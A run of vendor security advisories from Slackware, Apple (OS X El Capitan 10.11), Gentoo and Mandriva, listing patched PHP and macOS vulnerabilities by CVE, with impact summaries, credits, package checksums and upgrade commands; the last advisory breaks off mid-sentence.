http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1351
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2301
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2305
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2331
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3330
(* Security fix *)
+--------------------------+
Where to find the new packages:
+-----------------------------+
Thanks to the friendly folks at the OSU Open Source Lab
(http://osuosl.org) for donating FTP and rsync hosting
to the Slackware project! :-)
Also see the "Get Slack" section on http://slackware.com for
additional mirror sites near you.
Updated package for Slackware 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/php-5.4.40-i486-1_slack14.0.txz
Updated package for Slackware x86_64 14.0:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/php-5.4.40-x86_64-1_slack14.0.txz
Updated package for Slackware 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/php-5.4.40-i486-1_slack14.1.txz
Updated package for Slackware x86_64 14.1:
ftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/php-5.4.40-x86_64-1_slack14.1.txz
Updated package for Slackware -current:
ftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/php-5.6.8-i486-1.txz
Updated package for Slackware x86_64 -current:
ftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/php-5.6.8-x86_64-1.txz
MD5 signatures:
+-------------+
Slackware 14.0 package:
2666059d6540b1b4385d25dfc5ebbe99 php-5.4.40-i486-1_slack14.0.txz
Slackware x86_64 14.0 package:
c146f500912ba9c7e5d652e5e3643c04 php-5.4.40-x86_64-1_slack14.0.txz
Slackware 14.1 package:
9efc8a96f9a3f3261e5f640292b1b781 php-5.4.40-i486-1_slack14.1.txz
Slackware x86_64 14.1 package:
2c95e077f314f1cfa3ee83b9aba90b91 php-5.4.40-x86_64-1_slack14.1.txz
Slackware -current package:
30d14f237c71fada0d594c2360a58016 n/php-5.6.8-i486-1.txz
Slackware x86_64 -current package:
1a0fcc590aa4dff5de5f08293936d0d9 n/php-5.6.8-x86_64-1.txz
Installation instructions:
+------------------------+
Upgrade the package as root:
# upgradepkg php-5.4.40-i486-1_slack14.1.txz
Then, restart Apache httpd:
# /etc/rc.d/rc.httpd stop
# /etc/rc.d/rc.httpd start
+-----+
Slackware Linux Security Team
http://slackware.com/gpg-key
security@slackware.com
+------------------------------------------------------------------------+
| To leave the slackware-security mailing list: |
+------------------------------------------------------------------------+
| Send an email to majordomo@slackware.com with this text in the body of |
| the email message: |
| |
| unsubscribe slackware-security |
| |
| You will get a confirmation message back containing instructions to |
| complete the process. Please do not reply to this email address. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2015-09-30-3 OS X El Capitan 10.11
OS X El Capitan 10.11 is now available and addresses the following:
Address Book
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to inject arbitrary code to
processes loading the Address Book framework
Description: An issue existed in Address Book framework's handling
of an environment variable. This issue was addressed through improved
environment variable handling.
CVE-ID
CVE-2015-5897 : Dan Bastone of Gotham Digital Science
AirScan
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may be able
to extract payload from eSCL packets sent over a secure connection
Description: An issue existed in the processing of eSCL packets.
This issue was addressed through improved validation checks.
CVE-ID
CVE-2015-5853 : an anonymous researcher
apache_mod_php
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in PHP
Description: Multiple vulnerabilities existed in PHP versions prior
to 5.5.27, including one which may have led to remote code execution.
This issue was addressed by updating PHP to version 5.5.27.
CVE-ID
CVE-2014-9425
CVE-2014-9427
CVE-2014-9652
CVE-2014-9705
CVE-2014-9709
CVE-2015-0231
CVE-2015-0232
CVE-2015-0235
CVE-2015-0273
CVE-2015-1351
CVE-2015-1352
CVE-2015-2301
CVE-2015-2305
CVE-2015-2331
CVE-2015-2348
CVE-2015-2783
CVE-2015-2787
CVE-2015-3329
CVE-2015-3330
Apple Online Store Kit
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may gain access to a user's keychain
items
Description: An issue existed in validation of access control lists
for iCloud keychain items. This issue was addressed through improved
access control list checks.
CVE-ID
CVE-2015-5836 : XiaoFeng Wang of Indiana University, Luyi Xing of
Indiana University, Tongxin Li of Peking University, Tongxin Li of
Peking University, Xiaolong Bai of Tsinghua University
AppleEvents
Available for: Mac OS X v10.6.8 and later
Impact: A user connected through screen sharing can send Apple
Events to a local user's session
Description: An issue existed with Apple Event filtering that
allowed some users to send events to other users. This was addressed
by improved Apple Event handling.
CVE-ID
CVE-2015-5849 : Jack Lawrence (@_jackhl)
Audio
Available for: Mac OS X v10.6.8 and later
Impact: Playing a malicious audio file may lead to an unexpected
application termination
Description: A memory corruption issue existed in the handling of
audio files. This issue issue was addressed through improved memory
handling.
CVE-ID
CVE-2015-5862 : YoungJin Yoon of Information Security Lab. (Adv.:
Prof. Taekyoung Kwon), Yonsei University, Seoul, Korea
bash
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in bash
Description: Multiple vulnerabilities existed in bash versions prior
to 3.2 patch level 57. These issues were addressed by updating bash
version 3.2 to patch level 57.
CVE-ID
CVE-2014-6277
CVE-2014-7186
CVE-2014-7187
Certificate Trust Policy
Available for: Mac OS X v10.6.8 and later
Impact: Update to the certificate trust policy
Description: The certificate trust policy was updated. The complete
list of certificates may be viewed at https://support.apple.com/en-
us/HT202858.
CFNetwork Cookies
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position can track a
user's activity
Description: A cross-domain cookie issue existed in the handling of
top level domains. The issue was address through improved
restrictions of cookie creation.
CVE-ID
CVE-2015-5885 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork FTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: Malicious FTP servers may be able to cause the client to
perform reconnaissance on other hosts
Description: An issue existed in the handling of FTP packets when
using the PASV command. This issue was resolved through improved
validation.
CVE-ID
CVE-2015-5912 : Amit Klein
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A maliciously crafted URL may be able to bypass HSTS and
leak sensitive data
Description: A URL parsing vulnerability existed in HSTS handling.
This issue was addressed through improved URL parsing.
CVE-ID
CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork HTTPProtocol
Available for: Mac OS X v10.6.8 and later
Impact: A malicious website may be able to track users in Safari
private browsing mode
Description: An issue existed in the handling of HSTS state in
Safari private browsing mode. This issue was addressed through
improved state handling.
CVE-ID
CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies
Available for: Mac OS X v10.6.8 and later
Impact: Connecting to a malicious web proxy may set malicious
cookies for a website
Description: An issue existed in the handling of proxy connect
responses. This issue was addressed by removing the set-cookie header
while parsing the connect response.
CVE-ID
CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua
University
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker with a privileged network position may intercept
SSL/TLS connections
Description: A certificate validation issue existed in NSURL when a
certificate changed. This issue was addressed through improved
certificate validation.
CVE-ID
CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to decrypt data protected by SSL
Description: There are known attacks on the confidentiality of RC4.
An attacker could force the use of RC4, even if the server preferred
better ciphers, by blocking TLS 1.0 and higher connections until
CFNetwork tried SSL 3.0, which only allows RC4. This issue was
addressed by removing the fallback to SSL 3.0.
CoreCrypto
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to determine a private key
Description: By observing many signing or decryption attempts, an
attacker may have been able to determine the RSA private key. This
issue was addressed using improved encryption algorithms.
CoreText
Available for: Mac OS X v10.6.8 and later
Impact: Processing a maliciously crafted font file may lead to
arbitrary code execution
Description: A memory corruption issue existed in the processing of
font files. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: A memory corruption issue existed in dyld. This was
addressed through improved memory handling.
CVE-ID
CVE-2015-5876 : beist of grayhash
Dev Tools
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : @PanguTeam
Disk Images
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue existed in DiskImages. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5847 : Filippo Bigarella, Luca Todesco
dyld
Available for: Mac OS X v10.6.8 and later
Impact: An application may be able to bypass code signing
Description: An issue existed with validation of the code signature
of executables. This issue was addressed through improved bounds
checking.
CVE-ID
CVE-2015-5839 : TaiG Jailbreak Team
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application can prevent some systems from
booting
Description: An issue existed with the addresses covered by the
protected range register. This issue was fixed by changing the
protected range.
CVE-ID
CVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore
EFI
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Apple Ethernet Thunderbolt adapter may be able
to affect firmware flashing
Description: Apple Ethernet Thunderbolt adapters could modify the
host firmware if connected during an EFI update. This issue was
addressed by not loading option ROMs during updates.
CVE-ID
CVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare
Finder
Available for: Mac OS X v10.6.8 and later
Impact: The "Secure Empty Trash" feature may not securely delete
files placed in the Trash
Description: An issue existed in guaranteeing secure deletion of
Trash files on some systems, such as those with flash storage. This
issue was addressed by removing the "Secure Empty Trash" option.
CVE-ID
CVE-2015-5901 : Apple
Game Center
Available for: Mac OS X v10.6.8 and later
Impact: A malicious Game Center application may be able to access a
player's email address
Description: An issue existed in Game Center in the handling of a
player's email. This issue was addressed through improved access
restrictions.
CVE-ID
CVE-2015-5855 : Nasser Alnasser
Heimdal
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to replay Kerberos credentials to
the SMB server
Description: An authentication issue existed in Kerberos
credentials. This issue was addressed through additional validation
of credentials using a list of recently seen credentials.
CVE-ID
CVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu
Fan of Microsoft Corporation, China
ICU
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in ICU
Description: Multiple vulnerabilities existed in ICU versions prior
to 53.1.0. These issues were addressed by updating ICU to version
55.1.
CVE-ID
CVE-2014-8146
CVE-2014-8147
CVE-2015-5922
Install Framework Legacy
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to gain root privileges
Description: A restriction issue existed in the Install private
framework containing a privileged executable. This issue was
addressed by removing the executable.
CVE-ID
CVE-2015-5888 : Apple
Intel Graphics Driver
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
system privileges
Description: Multiple memory corruption issues existed in the Intel
Graphics Driver. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5830 : Yuki MIZUNO (@mzyy94)
CVE-2015-5877 : Camillus Gerard Cai
IOAudioFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in IOAudioFamily that led to the
disclosure of kernel memory content. This issue was addressed by
permuting kernel pointers.
CVE-ID
CVE-2015-5864 : Luca Todesco
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5871 : Ilja van Sprundel of IOActive
CVE-2015-5872 : Ilja van Sprundel of IOActive
CVE-2015-5873 : Ilja van Sprundel of IOActive
CVE-2015-5890 : Ilja van Sprundel of IOActive
IOGraphics
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An issue existed in IOGraphics which could have led to
the disclosure of kernel memory layout. This issue was addressed
through improved memory management.
CVE-ID
CVE-2015-5865 : Luca Todesco
IOHIDFamily
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to execute arbitrary
code with system privileges
Description: Multiple memory corruption issues existed in
IOHIDFamily. These issues were addressed through improved memory
handling.
CVE-ID
CVE-2015-5866 : Apple
CVE-2015-5867 : moony li of Trend Micro
IOStorageFamily
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to read kernel memory
Description: A memory initialization issue existed in the kernel.
This issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5863 : Ilja van Sprundel of IOActive
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: Multiple memory corruption issues existed in the
Kernel. These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team
CVE-2015-5896 : Maxime Villard of m00nbsd
CVE-2015-5903 : CESG
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local process can modify other processes without
entitlement checks
Description: An issue existed where root processes using the
processor_set_tasks API were allowed to retrieve the task ports of
other processes. This issue was addressed through additional
entitlement checks.
CVE-ID
CVE-2015-5882 : Pedro Vilaca, working from original research by
Ming-chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may control the value of stack cookies
Description: Multiple weaknesses existed in the generation of user
space stack cookies. These issues were addressed through improved
generation of stack cookies.
CVE-ID
CVE-2013-3951 : Stefan Esser
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker may be able to launch denial of service attacks
on targeted TCP connections without knowing the correct sequence
number
Description: An issue existed in xnu's validation of TCP packet
headers. This issue was addressed through improved TCP packet header
validation.
CVE-ID
CVE-2015-5879 : Jonathan Looney
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a local LAN segment may disable IPv6 routing
Description: An insufficient validation issue existed in the
handling of IPv6 router advertisements that allowed an attacker to
set the hop limit to an arbitrary value. This issue was addressed by
enforcing a minimum hop limit.
CVE-ID
CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed that led to the disclosure of kernel
memory layout. This was addressed through improved initialization of
kernel memory structures.
CVE-ID
CVE-2015-5842 : beist of grayhash
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in debugging interfaces that led to
the disclosure of memory content. This issue was addressed by
sanitizing output from debugging interfaces.
CVE-ID
CVE-2015-5870 : Apple
Kernel
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to cause a system denial of service
Description: A state management issue existed in debugging
functionality. This issue was addressed through improved validation.
CVE-ID
CVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team
libc
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse
Corporation
libpthread
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
libxpc
Available for: Mac OS X v10.6.8 and later
Impact: Many SSH connections could cause a denial of service
Description: launchd had no limit on the number of processes that
could be started by a network connection. This issue was addressed by
limiting the number of SSH processes to 40.
CVE-ID
CVE-2015-5881 : Apple
Login Window
Available for: Mac OS X v10.6.8 and later
Impact: The screen lock may not engage after the specified time
period
Description: An issue existed with captured display locking. The
issue was addressed through improved lock handling.
CVE-ID
CVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau
informationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni
Vaahtera, and an anonymous researcher
lukemftpd
Available for: Mac OS X v10.6.8 and later
Impact: A remote attacker may be able to deny service to the FTP
server
Description: A glob-processing issue existed in tnftpd. This issue
was addressed through improved glob validation.
CVE-ID
CVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com
Mail
Available for: Mac OS X v10.6.8 and later
Impact: Printing an email may leak sensitive user information
Description: An issue existed in Mail which bypassed user
preferences when printing an email. This issue was addressed through
improved user preference enforcement.
CVE-ID
CVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya,
Dennis Klein from Eschenburg, Germany, Jeff Hammett of Systim
Technology Partners
Mail
Available for: Mac OS X v10.6.8 and later
Impact: An attacker in a privileged network position may be able to
intercept attachments of S/MIME-encrypted e-mail sent via Mail Drop
Description: An issue existed in handling encryption parameters for
large email attachments sent via Mail Drop. The issue is addressed by
no longer offering Mail Drop when sending an encrypted e-mail.
CVE-ID
CVE-2015-5884 : John McCombs of Integrated Mapping Ltd
Multipeer Connectivity
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may be able to observe unprotected
multipeer data
Description: An issue existed in convenience initializer handling in
which encryption could be actively downgraded to a non-encrypted
session. This issue was addressed by changing the convenience
initializer to require encryption.
CVE-ID
CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension
Available for: Mac OS X v10.6.8 and later
Impact: A malicious application may be able to determine kernel
memory layout
Description: An uninitialized memory issue in the kernel led to the
disclosure of kernel memory content. This issue was addressed through
improved memory initialization.
CVE-ID
CVE-2015-5831 : Maxime Villard of m00nbsd
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: An issue existed in parsing links in the Notes
application. This issue was addressed through improved input
validation.
CVE-ID
CVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher
Notes
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to leak sensitive user information
Description: A cross-site scripting issue existed in parsing text by
the Notes application. This issue was addressed through improved
input validation.
CVE-ID
CVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)
OpenSSH
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSH
Description: Multiple vulnerabilities existed in OpenSSH versions
prior to 6.9. These issues were addressed by updating OpenSSH to
version 6.9.
CVE-ID
CVE-2014-2532
OpenSSL
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in OpenSSL
Description: Multiple vulnerabilities existed in OpenSSL versions
prior to 0.9.8zg. These were addressed by updating OpenSSL to version
0.9.8zg.
CVE-ID
CVE-2015-0286
CVE-2015-0287
procmail
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in procmail
Description: Multiple vulnerabilities existed in procmail versions
prior to 3.22. These issues were addressed by removing procmail.
CVE-ID
CVE-2014-3618
remote_cmds
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with root
privileges
Description: An issue existed in the usage of environment variables
by the rsh binary. This issue was addressed by dropping setuid
privileges from the rsh binary.
CVE-ID
CVE-2015-5889 : Philip Pettersson
removefile
Available for: Mac OS X v10.6.8 and later
Impact: Processing malicious data may lead to unexpected application
termination
Description: An overflow fault existed in the checkint division
routines. This issue was addressed with improved division routines.
CVE-ID
CVE-2015-5840 : an anonymous researcher
Ruby
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in Ruby
Description: Multiple vulnerabilities existed in Ruby versions prior
to 2.0.0p645. These were addressed by updating Ruby to version
2.0.0p645.
CVE-ID
CVE-2014-8080
CVE-2014-8090
CVE-2015-1855
Security
Available for: Mac OS X v10.6.8 and later
Impact: The lock state of the keychain may be incorrectly displayed
to the user
Description: A state management issue existed in the way keychain
lock status was tracked. This issue was addressed through improved
state management.
CVE-ID
CVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron,
Eric E. Lawrence, Apple
Security
Available for: Mac OS X v10.6.8 and later
Impact: A trust evaluation configured to require revocation checking
may succeed even if revocation checking fails
Description: The kSecRevocationRequirePositiveResponse flag was
specified but not implemented. This issue was addressed by
implementing the flag.
CVE-ID
CVE-2015-5894 : Hannes Oud of kWallet GmbH
Security
Available for: Mac OS X v10.6.8 and later
Impact: A remote server may prompt for a certificate before
identifying itself
Description: Secure Transport accepted the CertificateRequest
message before the ServerKeyExchange message. This issue was
addressed by requiring the ServerKeyExchange first.
CVE-ID
CVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine
Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of
INRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of
Microsoft Research, Pierre-Yves Strub of IMDEA Software Institute
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue existed in the kernel. This
issue was addressed through improved memory handling.
CVE-ID
CVE-2015-5891 : Ilja van Sprundel of IOActive
SMB
Available for: Mac OS X v10.6.8 and later
Impact: A local user may be able to determine kernel memory layout
Description: An issue existed in SMBClient that led to the
disclosure of kernel memory content. This issue was addressed through
improved bounds checking.
CVE-ID
CVE-2015-5893 : Ilja van Sprundel of IOActive
SQLite
Available for: Mac OS X v10.6.8 and later
Impact: Multiple vulnerabilities in SQLite v3.8.5
Description: Multiple vulnerabilities existed in SQLite v3.8.5.
These issues were addressed by updating SQLite to version 3.8.10.2.
CVE-ID
CVE-2015-3414
CVE-2015-3415
CVE-2015-3416
Telephony
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker can place phone calls without the user's
knowledge when using Continuity
Description: An issue existed in the authorization checks for
placing phone calls. This issue was addressed through improved
authorization checks.
CVE-ID
CVE-2015-3785 : Dan Bastone of Gotham Digital Science
Terminal
Available for: Mac OS X v10.6.8 and later
Impact: Maliciously crafted text could mislead the user in Terminal
Description: Terminal did not handle bidirectional override
characters in the same way when displaying text and when selecting
text. This issue was addressed by suppressing bidirectional override
characters in Terminal.
CVE-ID
CVE-2015-5883 : an anonymous researcher
tidy
Available for: Mac OS X v10.6.8 and later
Impact: Visiting a maliciously crafted website may lead to arbitrary
code execution
Description: Multiple memory corruption issues existed in tidy.
These issues were addressed through improved memory handling.
CVE-ID
CVE-2015-5522 : Fernando Munoz of NULLGroup.com
CVE-2015-5523 : Fernando Munoz of NULLGroup.com
Time Machine
Available for: Mac OS X v10.6.8 and later
Impact: A local attacker may gain access to keychain items
Description: An issue existed in backups by the Time Machine
framework. This issue was addressed through improved coverage of Time
Machine backups.
CVE-ID
CVE-2015-5854 : Jonas Magazinius of Assured AB
Note: OS X El Capitan 10.11 includes the security content of
Safari 9: https://support.apple.com/kb/HT205265.
OS X El Capitan 10.11 may be obtained from the Mac App Store:
http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw
S5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO
/hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6
QhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54
YJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop
hpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O
c3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR
8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r
N1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT
fJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1
nJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e
g6jld/w5tPuCFhGucE7Z
=XciV
-----END PGP SIGNATURE-----
.
Background
==========
PHP is a widely-used general-purpose scripting language that is
especially suited for Web development and can be embedded into HTML. Please review the
CVE identifiers referenced below for details.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All PHP 5.4 users should upgrade to the latest 5.5 stable branch, as
PHP 5.4 is now masked in Portage:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.5 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.5.33"
All PHP 5.6 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=dev=lang/php-5.6.19"
References
==========
[ 1 ] CVE-2013-6501
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-6501
[ 2 ] CVE-2014-9705
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9705
[ 3 ] CVE-2014-9709
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-9709
[ 4 ] CVE-2015-0231
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0231
[ 5 ] CVE-2015-0273
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-0273
[ 6 ] CVE-2015-1351
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1351
[ 7 ] CVE-2015-1352
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-1352
[ 8 ] CVE-2015-2301
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2301
[ 9 ] CVE-2015-2348
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2348
[ 10 ] CVE-2015-2783
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2783
[ 11 ] CVE-2015-2787
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-2787
[ 12 ] CVE-2015-3329
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3329
[ 13 ] CVE-2015-3330
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-3330
[ 14 ] CVE-2015-4021
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4021
[ 15 ] CVE-2015-4022
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4022
[ 16 ] CVE-2015-4025
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4025
[ 17 ] CVE-2015-4026
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4026
[ 18 ] CVE-2015-4147
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4147
[ 19 ] CVE-2015-4148
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4148
[ 20 ] CVE-2015-4642
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4642
[ 21 ] CVE-2015-4643
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4643
[ 22 ] CVE-2015-4644
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-4644
[ 23 ] CVE-2015-6831
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6831
[ 24 ] CVE-2015-6832
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6832
[ 25 ] CVE-2015-6833
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6833
[ 26 ] CVE-2015-6834
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6834
[ 27 ] CVE-2015-6835
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6835
[ 28 ] CVE-2015-6836
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6836
[ 29 ] CVE-2015-6837
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6837
[ 30 ] CVE-2015-6838
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-6838
[ 31 ] CVE-2015-7803
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7803
[ 32 ] CVE-2015-7804
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2015-7804
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
https://security.gentoo.org/glsa/201606-10
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2016 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
_______________________________________________________________________
Mandriva Linux Security Advisory MDVSA-2015:080
http://www.mandriva.com/en/support/security/
_______________________________________________________________________
Package : php
Date : March 28, 2015
Affected: Business Server 2.0
_______________________________________________________________________
Problem Description:
Multiple vulnerabilities has been discovered and corrected in php:
It was discovered that the file utility contains a flaw in the handling
of indirect magic rules in the libmagic library, which leads to an
infinite recursion when trying to determine the file type of certain
files (CVE-2014-1943).
A flaw was found in the way the file utility determined the type of
Portable Executable (PE) format files, the executable format used on
Windows. A malicious PE file could cause the file utility to crash or,
